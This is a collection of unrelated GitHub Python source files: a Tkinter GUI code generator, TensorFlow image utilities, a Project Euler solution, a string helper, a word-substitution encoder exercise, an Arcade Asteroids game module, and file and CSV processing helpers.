self.allComponent.append(lbl)\r\n \r\n def addCheckbutton(self): #添加checkbutton,创建myCheckbutton实例\r\n cbt = myCheckbutton(self.root,len(self.allComponent))\r\n self.allComponent.append(cbt) \r\n \r\n def addRadiobutton(self): #添加radiobutton,创建myRadiobutton实例\r\n rbt = myRadiobutton(self.root,len(self.allComponent))\r\n self.allComponent.append(rbt) \r\n \r\n \r\n def outputPy(self): #输出.py文件\r\n #在目录下创建一个project文件夹,再创建或打开一个GUIofProject.py文件\r\n path = os.getcwd() \r\n path = path + '\\\\project'\r\n if not os.path.exists(path):\r\n os.makedirs(path)\r\n self.GUIpy = open(path+'\\\\'+'GUIofProject.py','w')\r\n GUIpy = self.GUIpy\r\n \r\n #写.py文件的开头部分\r\n GUIpy.write('#coding:utf-8\\n')\r\n GUIpy.write('from Tkinter import *\\n')\r\n GUIpy.write('\\nclass GUIofProject:\\n')\r\n GUIpy.write(' def __init__(self):\\n')\r\n GUIpy.write(' self.root = Tk()\\n')\r\n GUIpy.write(' self.root.title(\\'GUIofProject\\')\\n')\r\n GUIpy.write(' self.root.geometry(\\''+str(self.w)+'x'+str(self.h)+'\\')\\n\\n')\r\n \r\n \r\n #先创建所有Radiobutton所关联的variable变量\r\n self.allvariable = {}\r\n for cpnt in self.allComponent:\r\n variable = cpnt.radioVariable()\r\n if variable != -1:\r\n if not variable in self.allvariable.keys():\r\n self.allvariable[variable] = 1\r\n GUIpy.write(' self.' + variable + ' = IntVar()\\n')\r\n \r\n GUIpy.write('\\n')\r\n \r\n #创建各个控件的代码,调用各控件的outputComponent函数\r\n for cpnt in self.allComponent:\r\n cpnt.outputComponent(self.GUIpy)\r\n \r\n variable = cpnt.radioVariable() #如果该控件是Radiobutton,创建关于其variable的有关代码\r\n if variable != -1:\r\n GUIpy.write(' self.' + cpnt.property['name'] + '.config(variable = self.' + cpnt.property['variable'] + ',value = ' + str(self.allvariable[variable]) + ')\\n')\r\n self.allvariable[variable] = self.allvariable[variable] + 1\r\n \r\n GUIpy.write('\\n')\r\n \r\n GUIpy.write(' self.root.mainloop()\\n')\r\n \r\n #创建各个button所调用的函数的代码 \r\n self.allCommand = []\r\n for cpnt in self.allComponent:\r\n command = cpnt.outputCommand()\r\n if command != -1:\r\n if not command in self.allCommand:\r\n self.allCommand.append(command)\r\n GUIpy.write('\\n')\r\n GUIpy.write(' def ' + command + '(self):\\n')\r\n GUIpy.write(' 1#在此输入' + cpnt.property['name'] + '按钮功能\\n')\r\n\r\n \r\n \r\n GUIpy.write('\\n\\na = GUIofProject()')\r\n \r\n GUIpy.close()\r\n \r\n showinfo('Output','输出成功,请查看本目录下project文件夹,并尽快拷贝以免后续输出覆盖')","repo_name":"liguanyu/TKIDLE","sub_path":"TKIDLE.py","file_name":"TKIDLE.py","file_ext":"py","file_size_in_byte":6429,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"39168388225","text":"import tensorflow as tf\nimport numpy as np\nfrom PIL import Image\nimport os\n\ndef variable_summaries(var):\n mean = tf.reduce_mean(var)\n tf.summary.scalar('mean', mean)\n stddev = tf.sqrt(tf.reduce_mean(tf.square(var - mean)))\n tf.summary.scalar('stddev', stddev)\n tf.summary.scalar('max', tf.reduce_max(var))\n tf.summary.scalar('min', tf.reduce_min(var))\n tf.summary.histogram('histogram', var)\n\ndef makepaths(conf):\n if conf.phase == 'train':\n conf.ckpt_path = os.path.join(conf.ckpt_path, \"quality=%d\"%(conf.quality))\n if not os.path.exists(conf.ckpt_path):\n os.makedirs(conf.ckpt_path)\n\n conf.param_path = os.path.join(conf.param_path, \"quality=%d\"%(conf.quality))\n if not os.path.exists(conf.param_path):\n os.makedirs(conf.param_path)\n\n conf.summary_path = os.path.join(conf.summary_path, \"quality=%d\"%(conf.quality))\n if tf.gfile.Exists(conf.summary_path):\n tf.gfile.DeleteRecursively(conf.summary_path)\n tf.gfile.MakeDirs(conf.summary_path)\n \n else:\n conf.image_path = os.path.join(conf.image_path, \"quality=%d\"%(conf.quality))\n if not os.path.exists(conf.image_path):\n os.makedirs(conf.image_path)\n\n return conf\n\ndef save_img(arr, path):\n arr = arr * 255\n arr = arr.reshape(arr.shape[0], arr.shape[1])\n \n for i in range(arr.shape[0]):\n for j in range(arr.shape[1]):\n if arr[i][j] > 255.0:\n arr[i][j] = 255.0\n if arr[i][j] < 0.0:\n arr[i][j] = 0.0\n \n img = Image.fromarray(arr.astype(np.uint8))\n img.save(path)","repo_name":"tonitick/AR-CNN","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"22"} +{"seq_id":"74637552055","text":"#/usr/bin/python\nimport results\nno_of_digits = 3\nmaxdigitvalue = (10**no_of_digits) - 1\nmaxvalue = maxdigitvalue**2\n\ndef problem4():\n print(maxvalue)\n palindrome = maxvalue\n for palindrome in range(maxvalue,0,-1):\n strnumber = str(palindrome)\n reversenumber = strnumber[::-1]\n if strnumber == reversenumber:\n return palindrome\n\nif __name__ == \"__main__\":\n problem_result = problem4()\n if problem_result == results.result[4]:\n print(\"Problem successful. Output: {}\".format(problem_result))\n else:\n print(\"Failed. Output: {}\".format(problem_result))","repo_name":"manasks/Project_Euler","sub_path":"problem4.py","file_name":"problem4.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"24980023583","text":"#!/usr/bin/python3\ndef remove_char_at(str, n):\n strcopy = \"\"\n if n > len(str) or n < 0:\n strcopy = str\n return(strcopy)\n for i in range(n):\n strcopy = strcopy + str[i]\n for i in range(n + 1, len(str)):\n strcopy = strcopy + str[i]\n return(strcopy)\n","repo_name":"kmerchan/holbertonschool-higher_level_programming","sub_path":"0x01-python-if_else_loops_functions/101-remove_char_at.py","file_name":"101-remove_char_at.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"27546800141","text":"\n\nclass Encoder:\n def __init__(self, encoding = {}):\n self.encoding = encoding\n\n def updateEncoding(self,string1,string2):\n list1 = str.split(string1)\n list2 = str.split(string2)\n self.encoding = {}\n for i in range(len(list1)):\n self.encoding[list1[i]] = list2[i]\n\n def encode(self, string):\n encodedstring = \"\"\n toencode = str.split(string)\n for i in range(len(toencode)):\n encodedstring += self.encoding[toencode[i]] + \" \"\n return encodedstring\n\n def decode(self, string):\n decodedic = {}\n for key in self.encoding:\n decodedic[self.encoding[key]] = key\n decodedstring = \"\"\n todecode = str.split(string)\n for i in range(len(todecode)):\n decodedstring += decodedic[todecode[i]] + \" \"\n return decodedstring\n\n\n\n##################################\n\"\"\"\n29.5:\n\nnein es gilt nicht, wenn z.B. das Dictionary für verschiedene schlüssel gleiche\nBedeutungen hat\n\nz.B. dict erstellt mit den strings:\n\"haus baum welt\"\n\"rot blau blau\"\n\nund übersetzt werden soll:\n\"baum welt haus\"\n\ndann erhält man am ende: \"welt welt haus\"\n\n\n\"\"\"\n\n\n\n\n#####################################\n#sauce foooter:\n\nfrom random import randint\ntry:\n #Create an Encoder object\n enc = Encoder()\n # Create two strings\n st1 = \"Lorem ipsum dolor sit amet consetetur sadipscing elitr sed diam nonumy eirmod tempor invidunt ut labore et dolore magna aliquyam erat voluptua\"\n st2 = \"At vero eos at accusam sit justo duo dolores et ea rebum Stet clita kasd gubergren no sea takimata sanctus est Lorem ipsum\"\n # set the dictionary\n enc.updateEncoding(st1,st2)\n # create a random sentence from words of the first sentence\n bagOfWords = str.split(st1)\n st3 = \"\"\n for i in range(19):\n st3 += bagOfWords[randint(0,len(bagOfWords)-1)]+\" \"\n st3 += bagOfWords[1]\n # encode the random sentence\n st4 = enc.encode(st3)\n # decode it\n st5 = enc.decode(st4)\n # print the random sentence\n print(\"#Encode String:\",st3)\n # print the encoded sentence\n print(\"#Decode String:\",st4)\n # print the decoded sentence\n print(\"#Result:\",st5)\n # in this case: if the random and the decoded sentence are equal, the test is passed\n if(str.split(st3) == str.split(st5)):\n print(\"correct\")\n else:\n print(\"Encoding or Decoding incorrect\")\n print(\"Line #Encode String: and Line #Result: should be equal\")\nexcept:\n print(\"Some names or functions do not work correctly or are wrongly named\")\n","repo_name":"B0mM3L6000/EiP","sub_path":"Uebung10/Aufgabe29.py","file_name":"Aufgabe29.py","file_ext":"py","file_size_in_byte":2576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"34585053336","text":"from multi_rake import Rake\nimport sys\n\nrake = Rake()\n\ntext = sys.argv[1];\n\nkeywords = rake.apply(text);\n\nkeywords_filtered = [ word for word, match in keywords];\n\nfor x in keywords_filtered[:10]:\n print(x);\n","repo_name":"Waguramu/scio-backend","sub_path":"annotation/multiRake/multi_rake_controller.py","file_name":"multi_rake_controller.py","file_ext":"py","file_size_in_byte":215,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"5151511809","text":"\"\"\"\nAsteroid Classes\nAll the classes to be used by asteroids.py\nAuthor Yurii Vasiuk\n\"\"\"\nimport math\nimport random\nimport arcade\nfrom abc import ABC\nfrom abc import abstractmethod\n\n\n# Global constants to use throughout the game\nSCREEN_WIDTH = 800\nSCREEN_HEIGHT = 600\n\nBULLET_RADIUS = 30\nBULLET_SPEED = 10\nBULLET_LIFE = 60\n\nSHIP_TURN_AMOUNT = 3\nSHIP_THRUST_AMOUNT = 0.25\nSHIP_REAR_THRUST_AMOUNT = 0.1\nSHIP_RADIUS = 30\n\nINITIAL_ROCK_COUNT = 5\n\nBIG_ROCK_SPIN = 1\nBIG_ROCK_SPEED = 1.5\nBIG_ROCK_RADIUS = 15\n\nMEDIUM_ROCK_SPIN = -2\nMEDIUM_ROCK_RADIUS = 5\n\nSMALL_ROCK_SPIN = 5\nSMALL_ROCK_RADIUS = 2\n\n\"\"\"\nThe next two classes will only be used as parts of other classes\nhas_a relationship\n\"\"\"\nclass Point:\n \"\"\"\n 1 Point\n \"\"\"\n def __init__(self, x = 0.0, y = 0.0):\n self.x = x\n self.y = y\n\nclass Velocity:\n \"\"\"\n 2 Velocity\n \"\"\"\n def __init__(self, dx = 0, dy = 0):\n self.dx = dx\n self.dy = dy\n\nclass FlyingObject(ABC):\n \"\"\"\n This is the basic abstract class\n it will branch out into Ship, Bullet, and Asteroid \n \"\"\"\n def __init__(self):\n self.center = Point()\n self.velocity = Velocity()\n self.alive = True\n self.radius = 0.0\n self.angle = 0.0\n\n # these two methods are used the same way by all flying objects\n # inheritance\n def wrap(self, screen_width, screen_height):\n \"\"\"\n return the leaving screen object on the other side of the screen\n :param screen_width: \n :param screen_height: \n :return: \n \"\"\"\n if self.center.x > screen_width + 30:\n self.center.x = 0 - 30\n if self.center.x < 0 - 30:\n self.center.x = screen_width + 30\n if self.center.y > screen_height + 30:\n self.center.y = 0 - 30\n if self.center.y < 0 - 30:\n self.center.y = screen_height + 30\n\n def advance(self):\n \"\"\"\n Move the object with every new frame for the distance of dx and dy\n :return: \n \"\"\"\n self.center.x += self.velocity.dx\n self.center.y += self.velocity.dy\n\n # abstract methods (have to be defined in every child class)\n @abstractmethod\n def draw(self):\n pass\n\n def hit(self):\n \"\"\"\n This method is the same for all FOs\n assign alive to False and use it for removing the dead object in the \"asteroids.py\"\n :return: \n \"\"\"\n self.alive = False\n\nclass Ship(FlyingObject):\n \"\"\"\n Properties and methods of the ship\n \"\"\"\n def __init__(self):\n super().__init__()\n self.center.x = SCREEN_WIDTH / 2\n self.center.y = SCREEN_HEIGHT / 2\n self.radius = SHIP_RADIUS\n self.alive = True\n\n def draw(self):\n \"\"\"\n draw the ship\n :return: \n \"\"\"\n img = \"images/playerShip1_orange.png\"\n texture = arcade.load_texture(img)\n\n width = texture.width\n height = texture.height\n alpha = 1 # For transparency, 1 means not transparent\n\n x = self.center.x\n y = self.center.y\n angle = self.angle\n\n arcade.draw_texture_rectangle(x, y, width, height, texture, angle, alpha)\n\n \"\"\"\n This block of methods handles moving the ship (turns, calculate the change of velocity\n for moving forward and slowing down; \n for advancing the ship the parent class method \"advance()\" is called in \"asteroids.py\")\n \"\"\"\n def turn_left(self):\n \"\"\"\n # 1 (3 degrees at a time, with the wrap angle logic)\n :return: \n \"\"\"\n if self.angle >= 360:\n self.angle = 0\n self.angle += 3\n\n def turn_right(self):\n \"\"\"\n # 2 (3 degrees at a time, with the wrap angle logic)\n :return: \n \"\"\"\n if self.angle <= 0:\n self.angle = 360\n self.angle -= 3\n\n def thrust(self):\n \"\"\"\n # 3 recalculate the ship's velocity (acceleration)\n :return: \n \"\"\"\n # the logic for getting the right angle and recalculating the velocity\n # depends on what quarter-sphere the \"self.angle\" is in\n # upper left quarter-sphere\n if self.angle >= 0 and self.angle <= 90:\n thrust_angle = 90 - self.angle\n self.velocity.dx -= math.cos(math.radians(thrust_angle)) * SHIP_THRUST_AMOUNT\n self.velocity.dy += math.sin(math.radians(thrust_angle)) * SHIP_THRUST_AMOUNT\n\n # lower left quarter-sphere\n if self.angle > 90 and self.angle < 180:\n thrust_angle = self.angle - 90\n self.velocity.dx -= math.cos(math.radians(thrust_angle)) * SHIP_THRUST_AMOUNT\n self.velocity.dy -= math.sin(math.radians(thrust_angle)) * SHIP_THRUST_AMOUNT\n\n # lower right quarter-sphere\n if self.angle >= 180 and self.angle <= 270:\n thrust_angle = 270 - self.angle\n self.velocity.dx += math.cos(math.radians(thrust_angle)) * SHIP_THRUST_AMOUNT\n self.velocity.dy -= math.sin(math.radians(thrust_angle)) * SHIP_THRUST_AMOUNT\n\n # upper right quarter-sphere\n if self.angle > 270 and self.angle < 360:\n thrust_angle = self.angle - 270\n self.velocity.dx += math.cos(math.radians(thrust_angle)) * SHIP_THRUST_AMOUNT\n self.velocity.dy += math.sin(math.radians(thrust_angle)) * SHIP_THRUST_AMOUNT\n\n def rear_thrust(self):\n \"\"\"\n the method is mirroring the \"thrust\" velocity calculations to the opposite \n for slowing down or moving backward (uses the lower \"SHIP_SLOW_DOWN\" coefficient)\n :return: \n \"\"\"\n # upper left quarter-sphere\n if self.angle >= 0 and self.angle <= 90:\n thrust_angle = 90 - self.angle\n self.velocity.dx += math.cos(math.radians(thrust_angle)) * SHIP_REAR_THRUST_AMOUNT\n self.velocity.dy -= math.sin(math.radians(thrust_angle)) * SHIP_REAR_THRUST_AMOUNT\n\n # lower left quarter-sphere\n if self.angle > 90 and self.angle < 180:\n thrust_angle = self.angle - 90\n self.velocity.dx += math.cos(math.radians(thrust_angle)) * SHIP_REAR_THRUST_AMOUNT\n self.velocity.dy += math.sin(math.radians(thrust_angle)) * SHIP_REAR_THRUST_AMOUNT\n\n # lower right quarter-sphere\n if self.angle >= 180 and self.angle <= 270:\n thrust_angle = 270 - self.angle\n self.velocity.dx -= math.cos(math.radians(thrust_angle)) * SHIP_REAR_THRUST_AMOUNT\n self.velocity.dy += math.sin(math.radians(thrust_angle)) * SHIP_REAR_THRUST_AMOUNT\n\n # upper right quarter-sphere\n if self.angle > 270 and self.angle < 360:\n thrust_angle = self.angle - 270\n self.velocity.dx -= math.cos(math.radians(thrust_angle)) * SHIP_REAR_THRUST_AMOUNT\n self.velocity.dy -= math.sin(math.radians(thrust_angle)) * SHIP_REAR_THRUST_AMOUNT\n\nclass Bullet(FlyingObject):\n \"\"\"\n Properties and methods of bullets \n \"\"\"\n def __init__(self):\n super().__init__()\n self.radius = BULLET_RADIUS\n self.lives = BULLET_LIFE\n\n def fire(self, ship):\n \"\"\"\n 1) assign the values of the point and the velocity of the ship to the fired bullet \n 2) recalculate the velocity for the fired bullet\n (add 10 pixels per frame in the direction the ship is pointed to the assigned ship velocity)\n :param ship: \n :return: \n \"\"\"\n self.center.x = ship.center.x\n self.center.y = ship.center.y\n self.velocity.dx = ship.velocity.dx\n self.velocity.dy = ship.velocity.dy\n self.angle = ship.angle + 90\n\n self.velocity.dx += math.cos(math.radians(self.angle)) * BULLET_SPEED\n self.velocity.dy += math.sin(math.radians(self.angle)) * BULLET_SPEED\n\n def draw(self):\n \"\"\"\n 1) all FOs are drawn the same way\n except of the path on the first line\n 2) decrease one live on every draw\n :return: \n \"\"\"\n img = \"images/laserBlue01.png\"\n texture = arcade.load_texture(img)\n\n width = texture.width\n height = texture.height\n alpha = 1 # For transparency, 1 means not transparent\n\n x = self.center.x\n y = self.center.y\n angle = self.angle\n\n arcade.draw_texture_rectangle(x, y, width, height, texture, angle, alpha)\n\n self.lives -= 1\n\n\"\"\"\nThe cluster of asteroid classes\n\"\"\"\nclass Asteroid(FlyingObject):\n \"\"\"\n This is the parent for different asteroids\n \"\"\"\n def __init__(self):\n \"\"\"\n Get everything from the parent class,\n ,pick random rotation angle, \n and initiate the list of fractions for breaking the asteroid apart\n \"\"\"\n super().__init__()\n random_choice = random.randint(0, 1)\n if random_choice == 0:\n self.spin = 1\n else:\n self.spin = -1\n self.fractions = list()\n\n def advance(self):\n \"\"\"\n call the parent advance and adjust the angle if needed\n :return: \n \"\"\"\n super().advance()\n if self.angle > 360:\n self.angle = 0\n if self.angle < 0:\n self.angle = 360\n\n @abstractmethod\n def break_apart(self):\n \"\"\"\n this method is implemented differently for different asteroids\n :param self: \n :return: \n \"\"\"\n pass\n\n\"\"\"\nThe next three classes inherit from Asteroid\nand make specific adjustments for different kinds of asteroids\n\"\"\"\nclass BigAsteroid(Asteroid):\n \"\"\"\n 1\n \"\"\"\n def __init__(self, point, velocity):\n super().__init__()\n self.center = point\n self.velocity = velocity\n self.radius = BIG_ROCK_RADIUS\n\n def draw(self):\n \"\"\"\n all asteroids are drawn the same way\n except of the path on the first line\n :return: \n \"\"\"\n img = \"images/meteorGrey_big1.png\"\n texture = arcade.load_texture(img)\n\n width = texture.width\n height = texture.height\n alpha = 1 # For transparency, 1 means not transparent\n\n x = self.center.x\n y = self.center.y\n angle = self.angle\n\n arcade.draw_texture_rectangle(x, y, width, height, texture, angle, alpha)\n\n def advance(self):\n \"\"\"\n call the parent advance and add\n changing the rotation angle for this kind of asteroid accordingly to the game specifications\n :return: \n \"\"\"\n super().advance()\n self.angle += (BIG_ROCK_SPIN * self.spin)\n\n def break_apart(self):\n \"\"\"\n # 1 make two medium and one small asteroids,\n # 2 put them into the list of fractions for using int the \"explode()\" in \"asteroids.py\" \n :return: \n \"\"\"\n # 1\n # make the first medium asteroid\n point1 = Point()\n point1.x = self.center.x\n point1.y = self.center.y\n velocity1 = Velocity()\n velocity1.dx = self.velocity.dx\n velocity1.dy = self.velocity.dy + 2\n fraction1 = MediumAsteroid(point1, velocity1)\n # make the second medium asteroid\n point2 = Point()\n point2.x = self.center.x\n point2.y = self.center.y\n velocity2 = Velocity()\n velocity2.dx = self.velocity.dx\n velocity2.dy = self.velocity.dy - 2\n fraction2 = MediumAsteroid(point2, velocity2)\n # make the small asteroid\n point3 = Point()\n point3.x = self.center.x\n point3.y = self.center.y\n velocity3 = Velocity()\n velocity3.dx = self.velocity.dx + 5\n velocity3.dy = self.velocity.dy\n fraction3 = SmallAsteroid(point3, velocity3)\n\n # 2\n self.fractions.append(fraction1)\n self.fractions.append(fraction2)\n self.fractions.append(fraction3)\n\nclass MediumAsteroid(Asteroid):\n \"\"\"\n 2\n \"\"\"\n def __init__(self, point, velocity):\n super().__init__()\n self.center = point\n self.velocity = velocity\n self.radius = MEDIUM_ROCK_RADIUS\n\n def draw(self):\n \"\"\"\n all asteroids are drawn the same way\n except of the path on the first line\n :return: \n \"\"\"\n img = \"images/meteorGrey_med1.png\"\n texture = arcade.load_texture(img)\n\n width = texture.width\n height = texture.height\n alpha = 1 # For transparency, 1 means not transparent\n\n x = self.center.x\n y = self.center.y\n angle = self.angle\n\n arcade.draw_texture_rectangle(x, y, width, height, texture, angle, alpha)\n\n def advance(self):\n \"\"\"\n call the parent advance and add\n changing the rotation angle for this kind of asteroid accordingly to the game specifications\n :return: \n \"\"\"\n super().advance()\n self.angle += (MEDIUM_ROCK_SPIN * self.spin)\n\n def break_apart(self):\n \"\"\"\n # 1 make two small asteroids,\n # 2 put them into the list of fractions for using int the \"explode()\" in \"asteroids.py\" \n :return: \n \"\"\"\n # 1\n # make the first small asteroid\n point1 = Point()\n point1.x = self.center.x\n point1.y = self.center.y\n velocity1 = Velocity()\n velocity1.dx = self.velocity.dx + 1.5\n velocity1.dy = self.velocity.dy + 1.5\n fraction1 = SmallAsteroid(point1, velocity1)\n # make the second medium asteroid\n point2 = Point()\n point2.x = self.center.x\n point2.y = self.center.y\n velocity2 = Velocity()\n velocity2.dx = self.velocity.dx - 1.5\n velocity2.dy = self.velocity.dy - 1.5\n fraction2 = SmallAsteroid(point2, velocity2)\n\n # 2\n self.fractions.append(fraction1)\n self.fractions.append(fraction2)\n\nclass SmallAsteroid(Asteroid):\n \"\"\"\n 3\n \"\"\"\n def __init__(self, point, velocity):\n super().__init__()\n self.center = point\n self.velocity = velocity\n self.radius = SMALL_ROCK_RADIUS\n\n def draw(self):\n \"\"\"\n all asteroids are drawn the same way\n except of the path on the first line\n :return: \n \"\"\"\n img = \"images/meteorGrey_small1.png\"\n texture = arcade.load_texture(img)\n\n width = texture.width\n height = texture.height\n alpha = 1 # For transparency, 1 means not transparent\n\n x = self.center.x\n y = self.center.y\n angle = self.angle\n\n arcade.draw_texture_rectangle(x, y, width, height, texture, angle, alpha)\n\n def advance(self):\n \"\"\"\n call the parent advance and add\n changing the rotation angle for this kind of asteroid accordingly to the game specifications\n :return: \n \"\"\"\n super().advance()\n self.angle += (SMALL_ROCK_SPIN * self.spin)\n\n def break_apart(self):\n \"\"\"\n the small asteroid does not split apart\n :return: \n \"\"\"\n pass\n","repo_name":"YuraVasiuk/Python-Projects","sub_path":"Assignments/project/Asteroids/asteroids_classes.py","file_name":"asteroids_classes.py","file_ext":"py","file_size_in_byte":14999,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"74734607414","text":"import json\r\nimport pandas as pd\r\nfrom labs.config.logger_config import logger\r\n\r\npd.set_option('display.max_rows', None)\r\npd.set_option('display.max_columns', None)\r\n\r\nclass FileProcessor:\r\n \"\"\"\r\n FileProcessor is a class that interacts with files for reading and writing.\r\n \"\"\"\r\n\r\n @staticmethod\r\n def write_into_file(file_path: str, text: str) -> None:\r\n \"\"\"\r\n Write text into a file. May raise PermissionError or OSError.\r\n \"\"\"\r\n with open(file_path, \"w\", encoding=\"utf-8\") as file:\r\n logger.info(\"Writing into file %s\", file_path)\r\n file.write(text)\r\n\r\n @staticmethod\r\n def read_from_file(file_path: str) -> str:\r\n \"\"\"\r\n Read text from a file. May raise FileNotFoundError, PermissionError, or OSError.\r\n \"\"\"\r\n with open(file_path, \"r\", encoding=\"utf-8\") as file:\r\n logger.info(\"Reading from file %s\", file_path)\r\n return file.read()\r\n\r\n @staticmethod\r\n def read_from_json(file_path: str) -> dict:\r\n \"\"\"\r\n Read a JSON file. May raise FileNotFoundError, PermissionError, OSError, or JSONDecodeError.\r\n \"\"\"\r\n with open(file_path, \"r\", encoding=\"utf-8\") as file:\r\n logger.info(\"Reading from file %s\", file_path)\r\n return json.load(file)\r\n\r\n @staticmethod\r\n def write_into_json(file_path: str, jsons: list) -> None:\r\n \"\"\"\r\n Write a JSON text into a file. May raise FileNotFoundError, PermissionError, OSError, or JSONDecodeError.\r\n \"\"\"\r\n if not isinstance(file_path, str):\r\n logger.critical(\"Wrong data type: %s. It has to be string!\", type(file_path))\r\n raise TypeError(\"Type of file_path must be string\")\r\n if not isinstance(jsons, list):\r\n logger.critical(\"Wrong data type: %s. It has to be list!\", type(jsons))\r\n raise TypeError(\"Type of jsons must be list\")\r\n\r\n jsons_text_representation = json.dumps(jsons, indent=4)\r\n json.loads(jsons_text_representation)\r\n\r\n with open(file_path, \"w\", encoding=\"utf-8\") as file:\r\n logger.info(\"Writing into file %s\", file_path)\r\n file.write(jsons_text_representation)\r\n\r\n\r\nclass CsvProcessor:\r\n \"\"\"\r\n CsvProcessor is used to interact with csv-files.\r\n \"\"\"\r\n\r\n @staticmethod\r\n def read(file_path: str) -> pd.DataFrame:\r\n \"\"\"\r\n Read a CSV file into a pandas DataFrame. May raise FileNotFoundError, PermissionError, or OSError.\r\n \"\"\"\r\n if not isinstance(file_path, str):\r\n logger.critical(\"Wrong data type: %s. It has to be string!\", type(file_path))\r\n raise TypeError(\"Type of file_path must be string\")\r\n return pd.read_csv(file_path)\r\n","repo_name":"BOHDAN1329/SMP","sub_path":"SMP(labs)/labs/lab9/shared/file_processor.py","file_name":"file_processor.py","file_ext":"py","file_size_in_byte":2753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"}